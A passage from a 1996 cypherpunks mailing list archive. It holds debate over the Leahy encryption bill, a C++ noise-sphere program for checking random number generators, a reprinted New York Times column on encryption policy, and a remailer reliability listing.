Once the page is up, you'll want to check it if you are thinking of 
sending something for inclusion.

I NEED URLS! If you know of a great FTP site, Please, send the address to 
me. 

I'd like to be able to offer a really comprehensive archive of as much 
material as possible, at a break-even price. The amount of assistance the 
people reading this list are willing to provide will be directly impact 
the quality and quantity of content on the CD, and also how quickly I am 
able to have the CD available. Any assistance would be truly appreciated.



Ben





------------------------------------------------------------------------------
Send Mail To:

bholiday@trader.tlx.net            (prefered)

bholiday@apollo.tlx.net            (prefered)

ncognito@gate.net                  (bad idea -- remailer and list mail could 
                                    cause mail to be deleted without being 
                                    viewed)


Gate net has an absolute quota of around 12 megs, so mail sent there may 
bounce if I get bombarded. Apollo and Trader allow me unlimited space, 
and are prefered. 

If you want to be really nice to me, put it on floppy and mail it to me - 
My Snailmail address is available on request. If you snail-mail materials 
for inclusion, I'll pay shipping for any CD's you buy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 25 Mar 1996 14:37:53 +0800
To: sandfort@crl.com>
Subject: Re: LIST OF SHAME VOLUNTEERS
In-Reply-To: <Pine.SUN.3.91.960324181903.22630A-100000@crl9.crl.com>
Message-ID: <wlJXiWq00YUvMMZph4@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


E. Clark writes:
> I neither like nor trust the bill and, after the Digital Telephony 
> Bill and its manner of passage, my trust in the good senator is zero.

I spoke to a couple folks about this at the CDA hearings in Philadelphia
last week. Word on the streets from those who would know is that the
Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
supporting to raise awareness of crypto.

After DT and Clipper, it's our chance to put Clinton and the DoJ on the
defensive for a change.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vipul Ved Prakash" <vipul@pobox.com>
Date: Mon, 25 Mar 1996 04:50:18 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Crypto CD
Message-ID: <199603242024.PAA27982@pobox.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> Could be useful to individuals, as well as for groups wishing to create 
> FTP sites etc. 

Excellent Idea. At least I haven't seen one around.
 
> Pricing with shipping would wind up around US$20.00, give or take 5 dollars..

> I'd like to know first off whether such a thing already exists. Secondly 
> whether anyone would be interested in possesing such a thing. And lastly 
> any suggestions for/about content that I may have missed..

How about PGP key archives?

Vipul
 
        .od8888bo.                              \|/
     .d%::::88::888b.             	       (@ @)
   .d888::::::::8:888%.   ------------------oOO-(_)-OOo-----------------
   88888:::::::88888::%.  You walk across with your flowers in your hand
  d888888:::88;888888::b       Trying to tell me no one understands
  888888888:888888888888   Trade in your hours for a hand full of dimes
  Y8888888::::::888888%P         Gonna make it baby in our prime.
  '8888888:::::::8888:%'  ----------------------------------------------
   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com
        '"Y88%B8P"'       ----------------------------------------------    
                              PGP Key : Finger <vipul@pobox.com>	                  
 PGP Key fingerprint =  35 FF A2 CA BD 6B 80 82  61 30 F2 23 96 93 77 E4 
~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=~-=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 25 Mar 1996 15:28:13 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: LIST OF SHAME VOLUNTEERS
In-Reply-To: <wlJXiWq00YUvMMZph4@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960325020948.13839A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Declan B. McCullagh wrote:

> E. Clark writes:
> > I neither like nor trust the bill and, after the Digital Telephony 
> > Bill and its manner of passage, my trust in the good senator is zero.
> 
> I spoke to a couple folks about this at the CDA hearings in Philadelphia
> last week. Word on the streets from those who would know is that the
> Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
> supporting to raise awareness of crypto.

I did a little weekend poking, I can confirm this.  If the Leahy bill 
passes, it will be a surprise (putting it mildly).

> 
> After DT and Clipper, it's our chance to put Clinton and the DoJ on the
> defensive for a change.
>

I suggest instead that everyone be nice and quiet.  If they get busy 
enough, this issue might not rear its ugly head for a few terms.

> -Declan
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 25 Mar 1996 17:28:21 +0800
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Noise Sphere Plotter in C++ (was Re: Noise sphere graphical tests of randomness)
Message-ID: <199603250551.AAA22514@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Mar 1996 22:29:52 GMT, I wrote:

>I've got a short program for the PC (w/TPascal source) that plots a 
>noise sphere from a file of (pseudo) random data, if anyone is 
>interested.  Requires a VGA card that handles mode 5Fh (640 x 480, 
[..]
>The source has a brief explanation of what noise spheres are and a 
>reference to the Pickover article the program was based on.

>The source code is not copyrighted, and it would be nice to see it ported to
>other systems, or maybe a portable C version that writes the output to a
>PCX file in RBG(?). [I'm not that fluent in C to write one...]
[..]

BTW, check the ftp.funet.fi site...

Somebody sent me a C++ conversion of it. It compiles fine with BCC 4.02.

Enclosed here (thanks to  "James Pate Williams, Jr." <pate@mindspring.com>)

/*
  NOISESPH.PAS, A Noise Sphere plotter written in Turbo Pascal (23-Mar-96)
  Robert Rothenburg Walking-Owl <WlkngOwl@unix.asb.com>
  No copyright is claimed.  No guarantees made.

  Usage: noisesph file

  This program reads a file of random or pseudo-random data and plots
  a noise sphere of the data. Poor RNGs or sampling methods will show
  clear patterns (definite splotches or spirals).

  The theory behind this is to get a set of 3D polar coordinates from
  the RNG and plot them.  An array is kept of the values, which is
  rotated each time a new byte is read (see the code in the main
  procedure).

  Rather than plot one sphere which can be rotated around any axis,
  it was easier to plot the sphere from three different angles.

  This program is based on a description from the article below.  It
  was proposed as a means of testing pseudo-RNGs:

  Pickover, Clifford A. 1995. "Random number generators: pretty good
	 ones are easy to find."  The Visual Computer (1005) 11:369-377.
*/

#include <conio.h>
#include <fstream.h>
#include <graphics.h>
#include <iostream.h>
#include <math.h>
#include <process.h>

struct Cartesian
{
  double x, y, z;
  unsigned Color;
};

struct Polar
{
  double r, theta, phi;
};

int MidA, MidB, MidC, MidY, Scale;

double ByteToReal(unsigned char b)
{
  /*note that there will be some gaps since we're only using the
	 equivalent of an 8-bit decimal here*/
  return  b / 256.0;
}

//Initialize the graphics screen
int InitScreen(void)
{
  int GraphMode, GraphDriver;

  GraphDriver = VGA;
  GraphMode = VGAHI;
  detectgraph(&GraphDriver, &GraphMode);
  initgraph(&GraphDriver, &GraphMode, "");
  Scale = getmaxx() / 6;
  MidA = Scale, MidB = 3 * Scale, MidC = 5 * Scale;
  MidY = getmaxy() / 2;
  if (MidY < Scale) Scale = MidY;
  return graphresult();
}

unsigned int ScaleColor(double)
{
  return LIGHTGRAY;
}

int Round(double x)
{
  return (int) (x + 0.5);
}

void Plot(struct Cartesian& C)
{
  putpixel(MidA + Round(Scale * C.y), MidY - Round(Scale * C.z), C.Color);
  putpixel(MidB + Round(Scale * C.x), MidY - Round(Scale * C.y), C.Color);
  putpixel(MidC + Round(Scale * C.z), MidY - Round(Scale * C.x), C.Color);
}

void PolarToCartesian(struct Polar P, struct Cartesian& C)
{
  //No rotation was added. Instead we plot from three angles...
  C.x = P.r * sin(P.phi) * cos(P.theta);
  C.y = P.r * sin(P.phi) * sin(P.theta);
  C.z = P.r * cos(P.phi);
  //We can assign colors based on x, y, z, r, theta / pi or phi / (2 * pi)
  C.Color = ScaleColor(C.y);
}

void main(int argc, char* argv[])
{
  double X[3];
  int error, i, n = 0;
  unsigned char byte;
  fstream inp;
  Cartesian C;
  Polar P;

  if (argc != 2)
  {
	 cout << "usage: noisesph filename" << endl;
	 exit(1);
  }
  inp.open(argv[1], ios::binary | ios::in);
  if (!inp)
  {
	 cout << "*error*\could not open input file" << endl;
	 exit(1);
  }
  error = InitScreen();
  if (error != grOk)
  {
	 cout << grapherrormsg(error) << endl;
	 exit(1);
  }
  for (i = 0; i < 3; i++)
  {
	 inp.get(byte);
	 X[i] = ByteToReal(byte);
  }
  do
  {
	 P.r = sqrt(X[(n + 2) % 3]);
	 P.theta = M_PI * X[(n + 1) % 3];
	 P.phi = 2 * M_PI * X[n];
	 PolarToCartesian(P, C);
	 Plot(C);
	 inp.get(byte);
	 X[n] = ByteToReal(byte);
	 n = (n + 1) % 3;
  }
  while (!kbhit() && inp);
  getch();
  closegraph();
}









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Mar 1996 21:58:23 +0800
To: cypherpunks@toad.com
Subject: NYT on Crypto Issue
Message-ID: <199603251143.GAA14247@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, March 25, 1996, p. D5.


   The key issue for the Net is not smut, it is the use of
   encryption

      Growing fears that Big Brother might decide to read your
      E-mail.

   By Denise Caruso


   The current uproar over the Internet is about smut and what
   can be made public on the global computer network. But the
   next public-policy tangle will be about what we're allowed
   to keep secret.

   Earlier this month, a bipartisan group from both houses of
   Congress introduced versions of legislation called the
   Encrypted Communications Privacy Act of 1996. This bill,
   which outlines the proper use of encryption technologies
   for privacy and security, is by far the most critical piece
   of Internet legislation yet introduced.

   Encryption uses a mathematical key to scramble and
   unscramble digital messages so they can be read only by
   their intended recipients and not by human or electronic
   snoopers. Legislation about this powerful technology is
   especially important when viewed in light of two laws
   already on the books.

   One of these, the Digital Telephony Act, signed into law in
   1994, allows Federal law-enforcement agencies to update the
   telephone network with the most pervasive surveillance
   equipment in history.

   The other, the freshly signed Communications Decency Act,
   bans "indecent" material from the Internet. It is a law
   that many legislators seemed to feel was on shaky ground
   even as Congress was passing it. A constitutional challenge
   to the law is currently being heard in Federal District
   Court in Philadelphia.

   Though the encryption bill as written is receiving
   qualified support from industry and civil libertarians,
   some worry that changes made in committee could make the
   bill too restrictive, completing a triumvirate of Big
   Brother legislation that would give law enforcement the
   ability and rationale to monitor all the electronic
   messages of citizens, leaving little or no recourse for
   private or secure communication.

   Such restrictions threaten to suffocate the Internet. As
   new users and businesses flock daily to the Internet, their
   need to protect confidential business data and messages
   becomes a key issue in making the Net safe enough to be
   useful. Computer security experts say that many of today's
   problems on the Net -- minors getting access to
   pornography, security breaches of corporate data, the need
   to prove one's identity -- could be solved by using
   encryption.

   Today, using encryption of any kind is still perfectly
   legal inside the United States. Historically, it was mostly
   used to protect secret military communications, so the
   technology is still classified as munitions -- the same
   threat to national security as a boatload of artillery
   shells. Thus any products containing encryption are subject
   to strict export controls.

   Law-enforcement and national security officials say that
   widespread use of strong encryption would enable terrorists
   and organized-crime syndicates to communicate with
   impunity. They say export control is the only way to keep
   this genie in its bottle, at least when it comes to
   foreign, not domestic crime.

   In addition, security experts have persuaded the Clinton
   Administration to propose an encryption method called "key
   escrow" that would give the Government access to
   information even after it had been encrypted. Key-escrow
   systems generate a decrypting key that is held by a trusted
   third party. When law-enforcement agents show up with a
   court warrant, the trustee hands over the key to unlock the
   message.

   So far, the Clinton Administration's proposals, which
   include a key-escrow system called Clipper have been
   universally reviled by both civil libertarians and the
   computer industry, which claims it stands to be deprived of
   up to $60 billion annually by the year 2000 because of
   export controls. They argue that any country today can make
   and sell encryption products stronger than what can be
   legally exported from the United States and that people
   won't use a system like key escrow because it has a
   built-in security compromise.

   One defender of key-escrow policy is Dorothy Denning, a
   professor of computer science at Georgetown University and
   a consultant to the military industry. She argued in a
   letter to Senator Patrick J. Leahy Democrat of Vermont --
   one of the sponsors of the new legislation -- that such a
   system was vital to public safety and security.

   James Barksdale, president of the Netscape Communications
   Corporation, whose popular Web-browser software has
   built-in encryption capabilities, called Ms. Denning's
   solution a "stopgap measure."

   "Key escrow is an unworkable idea, and we do not support
   it," Mr. Barksdale said. "Key escrow will be defeated just
   like Prohibition was defeated by bathtub gin -- all it took
   was a big bag of sugar and a long weekend."

   Policy watchdogs like the Center for Democracy and
   Technology and the Electronic Frontier Foundation, both
   outspoken advocates for privacy rights and due process,
   agree that the bill is headed in the right direction. It
   does not dictate the use of a key escrow system, eases
   export controls for "mass market" products (like
   Netscape's), prohibits any restriction on the domestic use
   or sale of encryption, and provides a "personal use" policy
   for American travelers who use encryption while outside the
   country.

   But the bill is sure to face a fight as it moves through
   the House and the Senate, and the key-escrow and
   export-control proponents marshal their experts.

   David Farber, a professor of computer science at the
   University of Pennsylvania and a board member of the
   Electronic Frontier Foundation, says encryption policy
   always turns into "a religious discussion" between those
   who fear terrorism and those who want to live without fear
   of constant surveillance.

   But, he adds, if you take privacy discussions to the
   people, their attitudes are pretty clear. " If you ask the
   American public what they think of national I.D. cards, for
   example, a huge percentage are opposed to them," he said.
   "Why? They're not hiding anything. They just don't want the
   Government to have that type of power."

   [End]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Mar 1996 23:41:41 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199603251450.GAA04021@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono nymrod)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 25 Mar 96 6:46:51 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              *+***-*++***     8:38 100.00%
ecafe    cpunk@remail.ecafe.org           #####*#-*#*#     2:14 100.00%
hacktic  remailer@utopia.hacktic.nl       ************     9:26  99.99%
portal   hfinney@shell.portal.com         #-**###*#-##     5:13  99.99%
pamphlet pamphlet@idiom.com               ---+++++++++  2:25:16  99.99%
haystack haystack@holy.cow.net            ##***+**-###     5:03  99.98%
exon     remailer@remailer.nl.com         ++**+++--***    29:20  99.98%
c2       remail@c2.org                    -++++*******    22:36  99.97%
nemesis  remailer@meaning.com             +********++*    24:47  99.97%
shinobi  remailer@shinobi.alias.net       -+#++*-#*###     3:46  99.88%
lead     mix@zifi.genetics.utah.edu       +*++++**++++    34:01  99.86%
tjava    remailer@tjava.com               ####*###* *#     1:08  99.73%
extropia remail@extropia.wimsey.com       -----------   6:14:43  99.64%
alpha    alias@alpha.c2.org               +++++  +++++    51:14  99.64%
nymrod   nymrod@nym.alias.net             ***++*++++-     31:12  99.56%
gondolin mix@remail.gondolin.org          --.-_____.-  45:37:44  99.50%
gondonym alias@nym.gondolin.org           --.._____.-  45:54:23  99.49%
flame    remailer@flame.alias.net         -------.---   5:31:19  99.38%
penet    anon@anon.penet.fi               _.._._.._    45:39:57  99.03%
alumni   hal@alumni.caltech.edu           *-+##*  * ##    24:59  98.83%
vishnu   mixmaster@vishnu.alias.net       *--++++++- -  3:51:29  98.62%
treehole remailer@mockingbird.alias.net   -++-- ---+++  4:35:40  98.58%
spook    remailer@spook.alias.net         *-  ++++****    29:38  98.48%
ncognito ncognito@gate.net                 ##* +*#*# #     1:37  98.08%
vegas    remailer@vegas.gateway.com       * **___.-*   19:25:45  97.30%
amnesia  amnesia@chardos.connix.com       --- ----- -   2:17:13  96.25%
mix      mixmaster@remail.obscura.com     ...+-+--+-    8:02:48  94.13%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Mar 1996 04:15:40 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <8lJfDXO00YUv87Z3A8@andrew.cmu.edu>
Message-ID: <Pine.SOL.3.91.960325075557.28271D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



If the Leahy bill is unacceptable, what legistlation is necessary? I 
can't see how the use of cryptography in the commission of a crime needs 
to be a separate offence, but I could see how it could be treated as a 
special circumstance - that doesn't really needed a new law though.

I do feel that it should be possible for courts to sub poena crypto keys, 
but that doesn't really need new law either (4th and 5th ammendments 
become _really_ important though (hmmm- there advantages to writing down a 
constitution after all :)

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 26 Mar 1996 05:40:27 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O',  shame)
In-Reply-To: <olJgezi00YUvE7Z68z@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.92.960325090932.24300C-100000@elaine47.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Declan B. McCullagh wrote:

> Leahy's bill will not pass. Period. However, with the introduction of
> this legislation comes a chance to get _our side_ heard by the unwired.

Hear hear. But I'm afraid that last should have been written in the past
tense. There it goes...

It would have been nice to have someone in the Congressional Record saying
something like, "While I don't agree with the implementation of this
specific bill, it is arguably less totalitarian than the current arbitrary
and unconstitutional policy."

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 26 Mar 1996 00:16:00 +0800
To: unicorn@schloss.li>
Subject: Re: LIST OF SHAME VOLUNTEERS
In-Reply-To: <Pine.SUN.3.91.960325020948.13839A-100000@polaris.mindport.net>
Message-ID: <8lJfDXO00YUv87Z3A8@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 25-Mar-96 Re: LIST OF SHAME
VOLUNTEERS by Black Unicorn@schloss.li 
> I did a little weekend poking, I can confirm this.  If the Leahy bill 
> passes, it will be a surprise (putting it mildly).

Especially since there are only -- how many? -- 40 or 50 days left in
this legislative session.

> > After DT and Clipper, it's our chance to put Clinton and the DoJ on the
> > defensive for a change.
>  
> I suggest instead that everyone be nice and quiet.  If they get busy 
> enough, this issue might not rear its ugly head for a few terms.

It's too late, I fear. Today's article in the NYT, for instance, doesn't
exactly help keep this issue quiet.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 26 Mar 1996 07:47:54 +0800
To: "Declan B. McCullagh" <sandfort@crl.com>
Subject: Re: LIST OF SHAME VOLUNTEERS
Message-ID: <m0u1GxP-00090nC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 AM 3/25/96 -0500, Declan B. McCullagh wrote:
>E. Clark writes:
>> I neither like nor trust the bill and, after the Digital Telephony 
>> Bill and its manner of passage, my trust in the good senator is zero.
>
>I spoke to a couple folks about this at the CDA hearings in Philadelphia
>last week. Word on the streets from those who would know is that the
>Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
>supporting to raise awareness of crypto.

This is a dangerous position to take.  Many people have killed themselves, accidentally, thinking "the gun isn't loaded!"  

This said, I see nothing wrong with fixing and improving the bill and only then supporting it.

>After DT and Clipper, it's our chance to put Clinton and the DoJ on the
>defensive for a change.

If the Leahy bill "has not a chance in hell" of passing, then what's wrong with CORRECTING it.  Given this assessment,I doubt whether such changes would reduce its chances.

BTW, remember that one of the reasons its chances are rated as "not a chance in hell" is that the two constituencies who might normally support this bill, the crypto/software businesses and ourselves, see its promises as being weak and its negatives as being large. Without them, who else is there to support it?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 26 Mar 1996 00:16:01 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Court Challenge: Day #2 (fwd)
Message-ID: <Pine.LNX.3.91.960325105400.2554A-100000@online.offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



Declan:
> I suggested to our attorney, Chris Hansen from the ACLU, that he
> clarify what percentage of newsgroups were moderated. On redirect,
> Hansen posed that question to Donna Hoffman of Vanderbilt University.
> She replied that most newsgroups are unmoderated. Later, Bradner of
> Harvard University added that moderated newsgroups amount to less
> than 10 percent of the total.

Another point is that the readers decide which moderated groups and
mailing lists they like.  If a moderator is no good people read other
groups. 

A good question might be "Is it the free market, or a government
commission, or Internet authority, that determines who gets to be a
moderator?" And then maybe, "Could anyone just make a newsgroup or mailing
list and be a moderator?"  And maybe, "In the future when it is easier to
pay for information on the Internet, is it reasonable to expect the amount
of effort that goes into editing and moderating to increase?" 

The key point that the free market provides editing when needed.  The
several companies that provide browsers that censor things for kids is the
free market "supply" to the "demand" of parents not wanting their kids to
see things. 

If the government really just must get involved, it could subsidize these
companies or this type of product.  :-)

  -  Vince
     vince@offshore.com.ai


PS  Some of us even go through the trouble to write a check and
    mail it in order to get an edited version of cypherpunks 
    called cp-lite. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 26 Mar 1996 05:43:27 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <Pine.SOL.3.91.960325075557.28271D-100000@chivalry>
Message-ID: <olJgezi00YUvE7Z68z@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 25-Mar-96 So, what crypto legislation.. by Simon
Spero@tipper.oit.u 
> If the Leahy bill is unacceptable, what legistlation is necessary? I 
> can't see how the use of cryptography in the commission of a crime needs 
> to be a separate offence, but I could see how it could be treated as a 
> special circumstance - that doesn't really needed a new law though.

Leahy's bill will not pass. Period. However, with the introduction of
this legislation comes a chance to get _our side_ heard by the unwired. 

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 26 Mar 1996 08:42:36 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <Pine.SUN.3.91.960325132049.26503B-100000@polaris.mindport.net>
Message-ID: <199603251937.LAA03810@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> I think many people on the list here had the right idea generally.  No 
> legislation is good legislation for crypto.  Really the ITAR 
> applications are beseiged right now, and will probably fizzle out of 
> their own accord, not to mention the fact that they are de facto moot.
> 
> In practice it is trivial to subvert ITAR for the purposes of 
> worldwide crypto availability.

	You've obviously never brought a crypto product to market
before.  Granted, worldwide *personal* use of crypto availability is
trivial, but not corporate.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Mar 1996 08:42:44 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: RISKS: Princeton discovers another Netscape security flaw
In-Reply-To: <9603251947.AA0350@smtp1.chipcom.com>
Message-ID: <Pine.SOL.3.91.960325113048.28515B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Mar 1996 Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com wrote:

> The job of doing something like what Java claims to do correctly
> is basically equivalent to the job of creating an A2 grade operating
> system. 

I'm not totally convinced that creating an A* implementation of the java 
VM is impossible; the vm instructions are simple enough to define the 
necessary abstract interpretations over, and denotational semantics 
of,with a reasonable degree of confidence. 

I'd definitely rather right a trusted application in java than in C 

Simon
---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Tue, 26 Mar 1996 04:56:43 +0800
